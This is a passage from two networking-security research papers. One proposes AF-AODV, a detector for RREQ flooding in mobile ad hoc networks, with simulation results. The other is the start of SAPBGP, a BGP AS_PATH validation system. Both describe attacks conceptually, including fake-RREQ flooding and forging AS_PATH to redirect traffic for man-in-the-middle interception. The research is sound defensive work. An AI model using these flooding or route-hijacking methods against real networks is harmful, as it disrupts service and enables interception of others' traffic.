destinations. Since the destination does not exist in the
network, a RREP packet cannot be generated by any node.
When a large number of fake RREQ packets is injected into
the network by malicious nodes, a significant proportion of
the network capacity is consumed by the RREQ packets,
depleting the bandwidth available for data. In addition, routing
tables accumulate reverse routes to the source of the fake
packets, often leading to table overflow and the inability to
record new valid routes. This is a type of denial of service
attack.
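The table-overflow side of the attack can be modelled with a short sketch (illustrative only; the capacity and packet counts are made-up values, not measurements from the paper):

```python
# Toy model of the RREQ flooding attack: each fake RREQ installs a
# useless reverse route until the routing table overflows, after which
# there is no room left to record new valid routes.

def flood(attacker_id, n_fake, routing_table, capacity):
    overflowed = 0
    for i in range(n_fake):
        dest = f"fake-{i}"                     # destination that does not exist
        if len(routing_table) >= capacity:
            overflowed += 1                    # table full: entries lost
        else:
            routing_table[dest] = attacker_id  # reverse route toward the flooder
    return overflowed

table = {"real-node": "neighbor-1"}            # one legitimate route
print(flood("attacker", 100, table, capacity=64))  # 37 fake RREQs find the table full
```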
Security mechanisms are added to existing routing protocols
to resist attacks. Cryptographic techniques are used to ensure
the authenticity and integrity of routing messages [8]. A major
concern is the trade-off between security and performance,
given the limited resources available at many MANET nodes.
Both symmetric and asymmetric cryptography have been used,
as well as hash chaining. Examples of these security-enhanced
protocols are Authenticated Routing for Ad-hoc Networks
(ARAN) [9], the Secure Link State Routing Protocol (SLSP)
[10], and Secure Ad-hoc On-demand Distance Vector routing
(SAODV) [11]. In addition to the power and computation cost
of using cryptographic techniques, the performance of a
secured mechanism such as SAODV is worse than that of
AODV [4] in the presence of a flooding attack, because the
malicious nodes impersonate non-existent nodes and cannot
be discovered by other, non-malicious nodes. Thus, securing
the routing messages cannot guarantee the detection of
flooding malicious nodes.
We introduce a new anti-flooding mechanism that can be
used with any on-demand routing protocol. In this mechanism,
each node is responsible for monitoring the behaviour of its
neighbors in order to detect malicious nodes and exclude them.
We integrate our proposed mechanism into AODV and SAODV
as examples of on-demand routing protocols. This paper
demonstrates a significant improvement in performance when
using our mechanism. The results reported here relate to
AODV, but we have also measured SAODV with this
mechanism, and the improvement in performance is even
higher than for AODV.
The rest of the paper is organized as follows. Section II
presents the related work. In Section III, our proposed
mechanism to detect the flooding attack is introduced. In
Section IV, the simulation approach and parameters are
presented. In Section V, simulation results are given. In
Section VI, conclusions are drawn.
II. RELATED WORK
Although many algorithms have been introduced to secure
MANETs, most of them cannot resist a flooding attack. A
malicious node initiating a flooding attack generates a large
number of RREQs to non-existent nodes. These RREQs flood
out through the MANET and, because the destination does not
exist, are propagated by all nodes. A node has no way of
detecting whether the neighbor that sent a RREQ is malicious
or not. All suggested solutions to the flooding attack attempt
to classify neighbors as normal or malicious nodes and then
suppress the malicious ones.
Flooding Attack Prevention (FAP) [12] was the first solution
proposed to resist the flooding attack. The algorithm defines a
neighbor suppression method that prioritizes each node based
on the number of RREQs received: a node gets higher priority
if it sends fewer RREQ packets. When a malicious node
broadcasts a large number of RREQ packets, the immediate
neighbors of the malicious node observe a high rate of RREQs
and lower the corresponding priority according to the rate of
incoming queries. Forwarding a received RREQ depends on
the priority value of the sending neighbor. The disadvantage
of this algorithm is that it still disseminates flooding packets,
albeit at a reduced rate.
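FAP's neighbor suppression can be sketched as follows (the priority function and cut-off below are hypothetical, since the summary above does not fix an exact formula; they only illustrate the "fewer RREQs, higher priority" rule):

```python
# Sketch of FAP-style neighbor suppression [12]: forwarding priority
# falls as a neighbor's observed RREQ count rises, so a flooder's
# packets are still disseminated, only at a reduced rate.

def priority(rreq_count):
    return 1.0 / (1.0 + rreq_count)      # fewer RREQs -> higher priority

def should_forward(rreq_count, cutoff=0.05):
    return priority(rreq_count) >= cutoff

assert should_forward(3)        # quiet neighbor: forwarded
assert not should_forward(50)   # flooder: mostly suppressed
```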
Threshold prevention [13] was introduced to modify FAP
by defining a fixed RREQ threshold. The algorithm assumes
that if the number of RREQ packets received from a neighbor
exceeds the threshold value, this neighbor is a malicious node,
and it discards all future packets from this node. The algorithm
becomes useless if a malicious node knows the threshold value,
since it can then bypass the mechanism. Another disadvantage
of this algorithm is that it treats a highly mobile normal node
as if it were malicious.
A distributed approach to resisting the flooding attack is
introduced in [14]. The algorithm defines two threshold values,
RATE_LIMIT and BLACKLIST_LIMIT. A RREQ from a
neighbor is processed only if the number of previously received
RREQs from this neighbor is less than RATE_LIMIT. On the
other hand, if the number of previously received RREQs from
this neighbor is greater than BLACKLIST_LIMIT, the RREQ
is discarded and this neighbor is blacklisted. If the number of
previously received RREQs from this neighbor is between
RATE_LIMIT and BLACKLIST_LIMIT, the RREQ is queued
for processing after a delay expires. A disadvantage of this
approach is the attacker's ability to subvert the algorithm by
learning the threshold levels, and the possibility of permanently
suspending a blacklisted neighbor that is not malicious.
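The two-threshold classification of [14] reduces to a simple decision function (the threshold values below are illustrative, not taken from [14]):

```python
# Sketch of the two-threshold scheme of [14]: process, delay, or
# blacklist a RREQ based on how many RREQs the sending neighbor
# has already issued.

RATE_LIMIT = 10
BLACKLIST_LIMIT = 20

def classify_rreq(prev_rreq_count):
    if prev_rreq_count < RATE_LIMIT:
        return "process"                 # well-behaved neighbor
    if prev_rreq_count > BLACKLIST_LIMIT:
        return "discard-and-blacklist"   # flooding neighbor
    return "queue"                       # suspicious: process after a delay
```

A real deployment would also need the delayed-processing timer and per-neighbor counters, which this sketch omits.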
The algorithm introduced in [15] approaches the flooding
attack from the communication point of view. It defines three
threshold values: a transmission threshold, a blacklist threshold,
and a whitelisting threshold. A RREQ from a neighbor is
processed only if the received RREQ rate from this neighbor
is less than the transmission threshold; otherwise the node
discards the RREQ. If the received RREQ rate from this
neighbor is greater than the blacklist threshold, the RREQ is
discarded and this neighbor is blacklisted. This algorithm
avoids permanently suspending a blacklisted neighbor by
introducing the whitelisting threshold: a blacklisted neighbor
can be returned to normal status if it behaves correctly for a
whitelisting time interval.
The algorithm introduced in [16] extends the DSR protocol
with a trust function to mitigate the effects of the flooding
attack. This algorithm classifies a node's neighbors into three
categories based on a trust value: friend, acquaintance, and
stranger. A friend is a trusted node and a stranger is a
non-trusted node, while an acquaintance has a trust value
greater than a stranger's and less than a friend's. The algorithm
defines a threshold value for each neighbor type. A node's
decision is taken based on the type of the neighbor that sends
the RREQ and the threshold value of this neighbor type. As a
general rule, when a node receives a RREQ from a neighbor,
it first checks the neighbor's relationship class and then checks
whether this neighbor has exceeded the relationship class
threshold value. The node processes the RREQ if this neighbor
is still running under the relationship class threshold; otherwise
it discards the RREQ and blacklists this neighbor. The
disadvantage of this algorithm is that it cannot support high
node mobility. [17] modifies this algorithm to support high
node mobility. A significant disadvantage of this approach is
that it depends on a modification of DSR and cannot be adapted
to other MANET protocols.
III. AF-AODV PROTOCOL
AF-AODV is designed to mitigate the effect of the flooding
attack on the performance of the AODV protocol. The
mechanism does not use cryptographic techniques, which
conserves power and computation resources. Each node in the
network monitors the behaviour of its neighbors to detect
whether they are trying to flood the network. Malicious nodes
are detected reliably within a few minutes. The only way for a
malicious node to subvert the mechanism is to transmit fake
RREQ packets at such a low rate that they do not significantly
impact network performance.
The idea is to record, for each neighbor, the rate at which
it transmits RREQs. A node pursuing a flooding attack will
generate a high number of RREQs. If the rate exceeds a
threshold, the neighbor is added to a black list of potentially
malicious nodes. Once on the black list, RREQs from the
blacklisted node are not forwarded, but they are still recorded.
A node can be removed from the list if its rate of RREQ
generation falls below the threshold. If the rate remains high,
the offending node is queried; only a non-malicious node will
respond. After two queries, the neighbor is suspended for a
period, and if its rate is still high after the period has elapsed,
it is declared malicious. A node implementing the anti-flooding
mechanism behaves as follows:
•	Every TRAFFIC_TIME, the number of RREQs received from each neighbor since the last classification update is examined.
•	If the number of RREQs received from a neighbor exceeds the threshold RREQ_THRESHOLD, that neighbor has its black_list value set to 1. If multiple neighbors exceed the threshold, the neighbor that has transmitted the largest number of RREQs has its black_list value set to 1; the other neighbors that exceeded the threshold are suspended. RREQs from suspended nodes are ignored and not forwarded. Suspending every offender except the one with the largest RREQ count allows the mechanism to avoid double counting of RREQs and to concentrate on classifying the worst offender. The value of RREQ_THRESHOLD is chosen by running AODV on a large number of scenarios and observing the largest number of RREQs that can be received in TRAFFIC_TIME.
•	RREQ packets are processed normally when received from neighbors with a black_list value of 0. If a RREQ is received from a neighbor with a black_list value of 1, the node examines how many RREQs have been received in an interval of RREQ_TIME_1. If that number is less than RREQ_COUNT_1, the black_list value for that neighbor is reset to 0. If it exceeds RREQ_COUNT_1, the node tests the authenticity of the neighbor by constructing a fake RREP packet for the RREQ and replying with it. If the neighbor is malicious, this will not result in any data flowing. If it is not malicious, data will flow to the fake RREP originator, which can respond with a RERR so that a new route can be found. If no data flows within RREP_WAIT_TIME, the neighbor's black_list value is set to 2.
•	If a RREQ is received from a neighbor with a black_list value of 2, the node re-examines the rate of RREQs received from that neighbor. If fewer than RREQ_COUNT_1 RREQs have been received in a duration of at most RREQ_TIME_1, it decrements the black_list value to 1. Otherwise the node again sends a fake RREP to the RREQ sender to test its authenticity. If RREP_WAIT_TIME expires without receiving data, the node sets the neighbor's black_list value to 3 and suspends this neighbor for a long period equal to the next TRAFFIC_TIME + EXCLUDE_TIME. This long suspension ensures that if the behaviour of this neighbor has been affected by a malicious node, that malicious node will have been identified and isolated during the suspension.
•	After the long suspension has expired, the node restarts the previous process: it again counts the RREQs received from this neighbor and, if the number is less than the threshold RREQ_THRESHOLD, decrements the black_list value to 2. Otherwise it increments the black_list value to 4.
•	If a RREQ is received from a neighbor with a black_list value of 4, the node monitors the rate of RREQs received from that neighbor. If fewer than RREQ_COUNT_1 RREQs have been received in a duration of at most RREQ_TIME_1, it decrements the black_list value to 3. Otherwise the node sends a fake RREP to the RREQ sender to test its authenticity for the final time. If RREP_WAIT_TIME expires without receiving data, the node sets the neighbor's black_list value to 5, meaning that the neighbor is a malicious node, and deletes it from the neighbor list. All RREQs received from a neighbor whose black_list value equals 5 are dropped without processing.

TABLE I. AF-AODV PARAMETERS

RREQ_THRESHOLD: 10
RREQ_COUNT_1: 7
RREQ_COUNT_2: 3
RREQ_TIME_1: 5
RREQ_TIME_2: 2
RREP_WAIT_TIME: 1 s
TRAFFIC_TIME: 10 s
EXCLUDE_TIME: 60 s
Table I shows the values of the parameters used in our
simulations.
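The classification rules above amount to a per-neighbor state machine over the black_list value. A simplified Python sketch follows (parameter names mirror Table I; the fake-RREP probe, suspension timers, and multi-neighbor tie-breaking of the full design are abstracted into single method calls):

```python
# Simplified sketch of the AF-AODV per-neighbor classifier.
# black_list runs from 0 (normal) to 5 (confirmed malicious).

RREQ_THRESHOLD = 10   # max RREQs tolerated per TRAFFIC_TIME window
MALICIOUS = 5         # value at which the neighbor is excluded

class NeighborState:
    def __init__(self):
        self.black_list = 0
        self.rreq_count = 0   # RREQs seen in the current window

    def on_window_end(self):
        """Called every TRAFFIC_TIME to examine the RREQ count."""
        if self.rreq_count > RREQ_THRESHOLD and self.black_list == 0:
            self.black_list = 1
        self.rreq_count = 0

    def on_probe_failed(self):
        """A fake RREP drew no data traffic: escalate toward malicious."""
        if self.black_list < MALICIOUS:
            self.black_list += 1

    def on_good_behavior(self):
        """Rate fell below RREQ_COUNT_1 within RREQ_TIME_1: de-escalate."""
        if 0 < self.black_list < MALICIOUS:
            self.black_list -= 1

    def is_malicious(self):
        return self.black_list >= MALICIOUS
```

A persistently noisy neighbor thus climbs 1, 2, 3, 4, 5 over successive failed probes and suspensions, while a well-behaved one steps back down toward 0.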
IV. SIMULATION APPROACH
The NS-2 simulator [18] is used to simulate the flooding
attack. The simulation is used to analyse the performance of
AODV and of our new AF-AODV routing protocol under this
attack. The parameters used are shown in Table II. Node
mobility was modelled with the random waypoint method. Our
simulation results are obtained from 3 different movement
scenarios, 3 different traffic scenarios, and 3 different
node-type (malicious or non-malicious) scenarios, which means
that each metric value is the mean of 27 runs. The node-type
scenarios are created randomly. In all cases, the 90%
confidence interval was small compared with the values being
reported. In this paper, we focus on the impact of the flooding
attack on TCP traffic only. We examined our proposed
mechanism for different numbers of nodes (25, 50, 75 and 100)
and different node speeds (0, 10, 20 and 30 m/s). Node mobility
had no significant effect on performance in the presence of
malicious nodes, so we report here only the case of static
networks. Similarly, only the case of 100-node networks is
reported, corresponding to a high density of nodes. This gives
malicious nodes a high number of neighbors. We chose a
large simulation time to ensure that all malicious nodes are
detected, especially in scenarios with a large number of
malicious nodes.

TABLE II. SIMULATION PARAMETERS

Simulation Time: 600 s
Simulation Area: 500 m x 500 m
Number of Nodes: 25, 50, 75, 100
Number of Malicious Nodes: 0 - 10
Node Speed: 0, 10, 20, 30 m/s
Pause Time: 10 s
Traffic Type: TCP
Flooding Rate: 2 packets/s

The following metrics are used to evaluate performance.
Packet Delivery Ratio (PDR): the ratio of packets successfully
delivered to a destination to the number of packets sent out by
the sender.
Throughput: the number of data bits delivered to the
application layer of the destination node per unit time,
measured in bps.
End-to-End Delay (EED): the average time taken for a packet
to be transmitted across the network from source to
destination.
Routing Overhead: the size of the routing packets, measured
in Kbytes, for route discovery and route maintenance needed
to deliver the data packets from sources to destinations.
Normalized Routing Load (NRL): the total number of routing
packets transmitted divided by the number of received data
packets.
Route Discovery Latency (RDL): the average delay between a
source sending a RREQ and receiving the first corresponding
RREP.
Sent Data Packets: the total number of packets sent by all
source nodes during the simulation time.
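These metrics reduce to simple ratios over simulation counters; a sketch (the counter values in the checks are illustrative, not results from the paper):

```python
# Helper functions for the evaluation metrics defined above.

def pdr(received_data_pkts, sent_data_pkts):
    """Packet Delivery Ratio."""
    return received_data_pkts / sent_data_pkts

def normalized_routing_load(routing_pkts, received_data_pkts):
    """NRL: routing packets transmitted per received data packet."""
    return routing_pkts / received_data_pkts

def throughput_bps(bits_delivered, duration_s):
    """Application-layer bits delivered per second."""
    return bits_delivered / duration_s

assert pdr(900, 1000) == 0.9
assert normalized_routing_load(3000, 1500) == 2.0
```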
The total number of data packets sent is shown in Figure 2.
The figure shows that the number of packets that can be sent
decreases dramatically as the number of malicious nodes
increases, to the extent that with 10 malicious nodes only 15%
of the packets sent in the absence of malicious nodes can be
sent. Our proposed mechanism, AF-AODV, provides an
enhancement of about 35% over AODV. In addition, AF-AODV
does not change significantly for small numbers of malicious
nodes. Combining Figure 1 and Figure 2, we can see a large
enhancement in the number of packets received by
destinations, especially for large numbers of malicious nodes.
For example, with 10 malicious nodes, the number of packets
received by destinations is approximately 5600 for AODV but
about 20250 for AF-AODV, so AF-AODV delivers roughly 3.6
times as many packets.
V. SIMULATION RESULTS
The effect of the flooding attack on the packet delivery ratio
is shown in Figure 1. While the flooding attack has a severe
impact on the PDR of AODV, especially for large numbers of
malicious nodes, the PDR of AF-AODV does not change
significantly for small numbers of malicious nodes and
decreases only negligibly for large numbers. AF-AODV
improves PDR over AODV by approximately 5%.
Figure 2. Sent Data Packets
Figure 3 shows the effect of the flooding attack on the network
throughput. The throughput of AF-AODV is better than that of
AODV by approximately 20% for each number of malicious
nodes. While the throughput of AODV decreases dramatically
as the number of malicious nodes increases, that of AF-AODV
decreases only slightly for small numbers of malicious nodes.
Figure 1. Packet Delivery Ratio
The enhancement of PDR becomes more remarkable when
considered together with the number of packets that can be
sent, shown in Figure 2.
Figure 3. Network Throughput
The effect of the flooding attack on the end-to-end delay is
shown in Figure 4. The results show no significant change in
the delay of AF-AODV, while the delay of AODV increases as
the number of malicious nodes increases.
Figure 6. Routing Overhead
Figure 5 shows the effect of the flooding attack on the
normalized routing load. The results show that while the
normalized routing load of AODV increases with the number
of malicious nodes, especially for large numbers of malicious
nodes, there is no significant change for AF-AODV.
Figure 4. End-to-End Delay
Figure 7. Route Discovery Latency
Figure 5. Normalized Routing Load
Figure 6 shows the effect of the flooding attack on the routing
overhead. The results show that the routing overhead of
AF-AODV does not change significantly for small numbers of
malicious nodes and increases only slightly as the number of
malicious nodes grows. For AODV, on the other hand, it
increases dramatically as the number of malicious nodes
increases.
Figure 7 shows the effect of the flooding attack on the route
discovery latency. The results show that the route discovery
latency of AF-AODV is nearly constant regardless of the
number of malicious nodes. For AODV, on the other hand, it
increases dramatically as the number of malicious nodes
increases.
The number of packets dropped as a result of detecting the
presence of malicious nodes is shown in Figure 8. The results
show that the number of packets AF-AODV drops increases
with the number of malicious nodes, while AODV cannot
detect the presence of malicious nodes and hence drops no
packets.
Our simulations show that, regardless of the number of nodes
and the number of malicious nodes in the network, a malicious
node's neighbors can detect its presence within a few minutes,
and the time needed to detect the last malicious node inevitably
increases with the number of malicious nodes. Figure 9 shows
the time required by non-malicious nodes to detect the last
malicious node in the network.
VI. CONCLUSION

In this paper, we introduced a new anti-flooding mechanism
that can be integrated into any reactive routing protocol in
MANETs. The proposed mechanism does not use cryptographic
techniques, which conserves power and computation resources.
Furthermore, the mechanism does not require any additional
packets and hence incurs no additional overhead. As an
example, we integrated our anti-flooding mechanism with
AODV to study the performance of the
network under the presence and absence of the mechanism. We
validated the performance analysis of our mechanism through
NS-2 simulations. Simulation results showed that AF-AODV
achieves a remarkable improvement over AODV in all network
metrics. The proposed mechanism succeeded in detecting
malicious nodes that try to flood the network within a few
minutes, regardless of the number of malicious nodes and the
time they participate in the network. Future work includes
extending this idea to other reactive protocols, and confirming
its general applicability.

Figure 8. Attack Dropped Packets

Figure 9. Time Required to Detect the Last Malicious Node by its Neighbors (for 25-, 50-, 75-, and 100-node networks)

REFERENCES

[1] A. Boukerche et al., "Routing protocols in ad hoc networks: a survey," Computer Networks, vol. 55, no. 13, September 2011, pp. 3032–3080.
[2] M. A. Abdelshafy and P. J. King, "Analysis of security attacks on AODV routing," in 8th International Conference for Internet Technology and Secured Transactions (ICITST), London, UK, Dec 2013, pp. 290–295.
[3] C. E. Perkins and E. M. Royer, "Ad-hoc on-demand distance vector routing," in Proceedings of the 2nd IEEE Workshop on Mobile Computing Systems and Applications, 1997, pp. 90–100.
[4] M. A. Abdelshafy and P. J. King, "AODV & SAODV under attack: performance comparison," in ADHOC-NOW 2014, LNCS 8487, Benidorm, Spain, Jun 2014, pp. 318–331.
[5] M. Patel and S. Sharma, "Detection of malicious attack in MANET: a behavioral approach," in IEEE 3rd International Advance Computing Conference (IACC), 2013, pp. 388–393.
[6] G. Usha and S. Bose, "Impact of gray hole attack on adhoc networks," in International Conference on Information Communication and Embedded Systems (ICICES), 2013, pp. 404–409.
[7] Y. Guo and S. Perreau, "Detect DDoS flooding attacks in mobile ad hoc networks," International Journal of Security and Networks, vol. 5, no. 4, Dec. 2010, pp. 259–269.
[8] P. Joshi, "Security issues in routing protocols in MANETs at network layer," Procedia CS, vol. 3, 2011, pp. 954–960.
[9] K. Sanzgiri et al., "Authenticated routing for ad hoc networks," IEEE Journal on Selected Areas in Communications, vol. 23, 2005, pp. 598–610.
[10] P. Papadimitratos and Z. J. Haas, "Secure link state routing for mobile ad hoc networks," in Symposium on Applications and the Internet Workshops, IEEE Computer Society, 2003, pp. 379–383.
[11] M. G. Zapata, "Secure ad hoc on-demand distance vector routing," SIGMOBILE Mob. Comput. Commun. Rev., vol. 6, no. 3, Jun 2002, pp. 106–107.
[12] P. Yi, Z. Dai, Y.-P. Zhong, and S. Zhang, "Resisting flooding attacks in ad hoc networks," in International Conference on Information Technology: Coding and Computing (ITCC), vol. 2, April 2005, pp. 657–662.
[13] B.-C. Peng and C.-K. Liang, "Prevention techniques for flooding attacks in ad hoc networks," in 3rd Workshop on Grid Technologies and Applications (WoGTA 06), Hsinchu, Taiwan, December 2006, pp. 657–662, vol. 2.
[14] J.-H. Song, F. Hong, and Y. Zhang, "Effective filtering scheme against RREQ flooding attack in mobile ad hoc networks," in Proceedings of the Seventh International Conference on Parallel and Distributed Computing, Applications and Technologies (PDCAT), Washington, DC, USA: IEEE Computer Society, 2006, pp. 497–502.
[15] V. Balakrishnan, V. Varadharajan, U. Tupakula, and M. Moe, "Mitigating flooding attacks in mobile ad-hoc networks supporting anonymous communications," in 2nd International Conference on Wireless Broadband and Ultra Wideband Communications (AusWireless), Aug 2007, pp. 29–34.
[16] R. Venkataraman, M. Pushpalatha, R. Khemka, and T. R. Rao, "Prevention of flooding attacks in mobile ad hoc networks," in Proceedings of the International Conference on Advances in Computing, Communication and Control (ICAC3), New York, NY, USA: ACM, 2009, pp. 525–529.
[17] U. D. Khartad and R. K. Krishna, "Route request flooding attack using trust based security scheme in MANET," International Journal of Smart Sensors and Ad Hoc Networks (IJSSAN), vol. 1, no. 4, 2012, pp. 27–33.
[18] The Network Simulator NS-2, http://www.isi.edu/nsnam/ns/ [retrieved: September, 2014].
The Policy-Based AS_PATH Verification to Monitor AS Path Hijacking
Je-Kuk Yun, Beomseok Hong
Information Technology, Towson University, Towson, U.S.A.
jyun4, bhong1@students.towson.edu

Yanggon Kim
Information Technology, Towson University, Towson, U.S.A.
ykim@towson.edu
Abstract— As the number of IP prefix hijacking incidents has
increased, many solutions have been proposed to prevent IP
prefix hijacking, such as RPKI, BGPmon, Argus, and PHAS.
Except for RPKI, all of the solutions proposed so far can
protect ASes only through origin validation. However, origin
validation cannot detect attacks that alter the AS_PATH
attribute, such as the AS Insertion attack and the Invalid
AS_PATH Data Insertion attack. To solve these problems,
SIDR proposed the RPKI using BGPSEC, but BGPSEC is
currently a work in progress. So, we propose Secure AS_PATH
BGP (SAPBGP), which monitors the AS_PATH attribute in
update messages, checking whether the ASes in the AS_PATH
attribute are connected to each other according to our policy
database built from the RIPE NCC repository. Our analysis
shows that 4.57% of AS_PATH attributes are invalid and
95.43% are valid from the fifteenth of April, 2014 to the eighth
of June, 2014. In addition, a performance test verifies that the
SAPBGP can process all of the live BGP messages coming
from BGPmon in real time.
Keywords- border gateway protocol; interdomain routing;
network security; networks; AS path hijacking.

I. INTRODUCTION

The Border Gateway Protocol (BGP) is the de-facto protocol
that enables large IP networks to form a single Internet [1].
The main objective of BGP is to exchange Network Layer
Reachability Information (NLRI) among Autonomous Systems
(ASes) so that BGP routers can transfer their traffic to the
destination.

However, BGP itself has no mechanism to verify whether a
route is valid, because a BGP speaker completely trusts other
BGP speakers. This lack of consideration of BGP
vulnerabilities often causes severe failures of Internet service
provision [2]. The most well-known of these failures is the
YouTube hijacking by Pakistan Telecom (AS17557) on the
24th of February, 2008 [3]. In response to the government's
order to block YouTube access within their ASes, Pakistan
Telecom announced a more specific prefix than the YouTube
prefix. Then one of Pakistan Telecom's upstream providers,
PCCW Global (AS3491), forwarded the announcement to
other neighbors. As a result, YouTube traffic from all over the
world was misled to Pakistan Telecom (AS17557) for two
hours. To solve these problems, many studies were conducted,
such as Resource Public Key Infrastructure (RPKI) [4],
BGPmon [5], Argus [6], and the Prefix Hijack Alert System
(PHAS) [7].

While there are many studies of IP prefix hijacking, few have
examined AS path hijacking. In 2013, Renesys observed
misdirected network traffic suspected of being the result of
man-in-the-middle (MITM) attacks. In February 2013, global
traffic was redirected to the Belarusian ISP GlobalOneBel
before reaching its intended destination, and this occurred on
an almost daily basis. Major financial institutions,
governments, and network service providers in several
countries, including the U.S., were affected by this traffic
diversion. From the thirty-first of July to the nineteenth of
August, the Icelandic provider Opin Kerfi announced
origination routes for 597 IP networks owned by a large VoIP
provider in the U.S. through Siminn, one of Opin Kerfi's two
ISPs. However, this announcement was never propagated
through Fjarskipti, the other of the two ISPs. As a result,
network traffic was sent to Siminn in London and then
redirected back to its intended destination. Networks in several
countries, including some Icelandic autonomous systems
belonging to Siminn, were affected. However, Opin Kerfi said
that the problem was the result of a software bug and had been
resolved [8].

To protect against AS path hijacking, the AS_PATH attribute
must not be manipulated. However, BGP itself cannot check
whether the AS_PATH attribute has been changed. If a routing
hijacker manipulates the AS_PATH attribute in a BGP message
sent by another router and forwards the manipulated message
to other neighbors, the neighbors who receive the manipulated
message can become victims of AS path hijacking. Only the
Secure Inter-Domain Routing (SIDR) working group has
proposed the RPKI using BGPSEC to validate the AS_PATH
attribute, but BGPSEC is currently a work in progress [9]. In
addition, one study argues that BGP armed with BGPSEC
cannot be secured because of BGP's fundamental design [10].

We propose Secure AS_PATH BGP (SAPBGP), which
constructs its own policy-based database by collecting the
RIPE NCC repository and checks whether the ASes listed in
the AS_PATH attribute of BGP update messages are actually
connected. For validation tests with real BGP messages, the
SAPBGP receives a live BGP stream from the BGPmon
project [11]. In addition, we conduct a performance test of the
SAPBGP to measure the duration of the validation with the
live BGP messages.

In this paper, given that BGP is vulnerable to the MITM
attack, we describe an attack scenario and a solution in Section
3. In Section 4, we introduce and explain the SAPBGP in
detail. We discuss the SAPBGP environment and analyze the
results of the SAPBGP validation and the performance test in
Section 5. Lastly, we conclude the paper in Section 6.
II. RELATED RESEARCH
A. BGPsec
BGPsec is a mechanism that provides routing path security for BGP route advertisements; it is a work in progress by the SIDR working group [9]. BGPsec relies on the RPKI, whose roots of trust are the Regional Internet Registries (RIRs): ARIN, LACNIC, APNIC, RIPE, and AFRINIC. Each RIR signs certificates to allocate its resources. The RPKI provides a Route Origination Authorization (ROA) to ASes that are authorized to advertise a specific prefix [12]. The ROA contains the prefix address, maximum length, and AS number, which certifies that the specified AS has permission to announce the prefixes. For routing path validation, each AS receives a key pair, consisting of a private key and a public key, from its RIR. Each BGP speaker signs the routing path before forwarding it to its neighbors.
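The ROA contents described above (prefix, maximum length, and AS number) are enough for a basic origin-validation check. The following Python sketch is our own illustration rather than part of any RPKI tooling; the dictionary layout and function name are assumptions:

```python
from ipaddress import ip_network

def roa_validates(roa, announced_prefix, origin_asn):
    """Check one announcement against one ROA (prefix, maxlength, ASN)."""
    roa_net = ip_network(roa["prefix"])
    ann_net = ip_network(announced_prefix)
    return (
        origin_asn == roa["asn"]                   # announced by the authorized AS
        and ann_net.subnet_of(roa_net)             # inside the ROA's prefix
        and ann_net.prefixlen <= roa["maxlength"]  # not more specific than allowed
    )

roa = {"prefix": "10.10.0.0/16", "maxlength": 20, "asn": 100}
print(roa_validates(roa, "10.10.0.0/16", 100))  # True: authorized origin
print(roa_validates(roa, "10.10.0.0/24", 100))  # False: exceeds maxlength
print(roa_validates(roa, "10.10.0.0/16", 400))  # False: wrong origin AS
```

Note that this check only validates the origin; as discussed in Section III, it cannot detect a forged AS_PATH whose origin information is correct.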
B. BGPmon
BGPmon is a monitoring infrastructure, implemented by Colorado State University, that collects BGP messages from distributed routers and offers these messages in real time as routes to destinations change [5]. Any BGP speaker connected to BGPmon can be a source of real-time update messages. Currently, nine BGP speakers participate in the BGPmon project as source routers. In addition, BGPmon collects a live stream in the Multi-threaded Routing Toolkit (MRT) format [13] from the RouteViews project through indirect peering. The MRT format defines a way to exchange and export routing information, through which researchers can obtain BGP messages from any router for analysis. Clients can connect to BGPmon via telnet and receive the live BGP stream in real time.
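As described in Section IV, BGPmon delivers each update as an XML message from which the AS_PATH can be parsed. The sketch below shows that parsing step on a sample message; the element names here are illustrative assumptions, not BGPmon's exact schema:

```python
import xml.etree.ElementTree as ET

# Hypothetical BGPmon-style XML update (element names are our own assumption).
SAMPLE = """<BGP_MESSAGE>
  <TIME timestamp="1393373000"/>
  <UPDATE>
    <AS_PATH>100 400 500</AS_PATH>
    <NLRI>10.10.0.0/16</NLRI>
  </UPDATE>
</BGP_MESSAGE>"""

def parse_as_path(xml_text):
    """Extract the AS_PATH from one XML update message as a list of ASNs."""
    root = ET.fromstring(xml_text)
    path = root.findtext(".//AS_PATH", default="")
    return [int(asn) for asn in path.split()]

print(parse_as_path(SAMPLE))  # [100, 400, 500]
```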
C. RIPE NCC
RIPE NCC is the Regional Internet Registry (RIR) in charge of the Europe/Middle East region. RIPE NCC manages the RIPE Data Repository, a collection of datasets for scientific Internet research, such as IP address space allocations and assignments, routing policies, reverse delegations, and contacts. The organizations or individuals who currently hold Internet resources are responsible for updating their information in the database. As a result, RIPE NCC can keep the Data Repository up to date and provide database APIs so that users can access the repository through web browsers or programs.
III. BGP THREATS AND SOLUTION

In this section, we introduce a scenario of AS path hijacking that leads to a MITM attack. In addition, we discuss how routing policy-based AS_PATH validation operates in order to prevent AS path hijacking.
A. Manipulating data in BGP updates
A BGP router inserts its own ASN into the AS_PATH attribute of an update message when it receives the message from a neighbor. However, a BGP router can also insert one or more ASNs other than its own into the AS_PATH attribute. In addition, a BGP router might pretend to be connected to a certain BGP router by manipulating the data contained in BGP updates.
Figure 1. Manipulating a BGP message
Figure 1 demonstrates an example of manipulating data in BGP update messages. Suppose AS 400 has a connection to AS 500 and creates a forged BGP announcement pretending that AS 400 received a BGP message originated by AS 100 and forwarded the update message to AS 500, even though AS 100 and AS 400 do not actually have a BGP connection. From AS 500's point of view, the traffic heading for prefix 10.10.0.0/16 will choose AS 400 as the best path, because AS 500 selects the shortest path and the path through AS 400 is shorter than the path through AS 300. Even if AS 500 can conduct origin validation, it cannot prevent this attack, because the prefix and origin ASN information are correct. As a result, AS 400 will receive the traffic heading for prefix 10.10.0.0/16 and might launch another attack using the traffic, such as a MITM attack.
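The attack works because, with other attributes being equal, BGP prefers the shortest AS_PATH. The following toy Python sketch is our own simplification of that single tie-breaking step, using the Figure 1 scenario:

```python
def best_path(candidate_paths):
    # Among otherwise-equal routes, BGP prefers the shortest AS_PATH.
    return min(candidate_paths, key=len)

legitimate = [300, 200, 100]  # genuine route toward AS 100's prefix
forged = [400, 100]           # AS 400 falsely claims a direct link to AS 100

# The forged, shorter path wins, so AS 500's traffic is drawn to AS 400.
print(best_path([legitimate, forged]))  # [400, 100]
```

Because the forged path still ends at the legitimate origin AS 100, origin validation alone accepts it, which is exactly the gap the SAPBGP targets.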
B. Man-in-the-middle (MITM) attack
The man-in-the-middle attack is active eavesdropping in which the attacker secretly creates connections to the victims and redirects large blocks of Internet traffic between the sources and the destinations as if the sources and destinations communicated directly. In such a case, the victims notice only slightly increased latency, because the packets travel more hops than normal. In the meantime, the attacker can monitor and manipulate the packets, creating opportunities for further attacks.
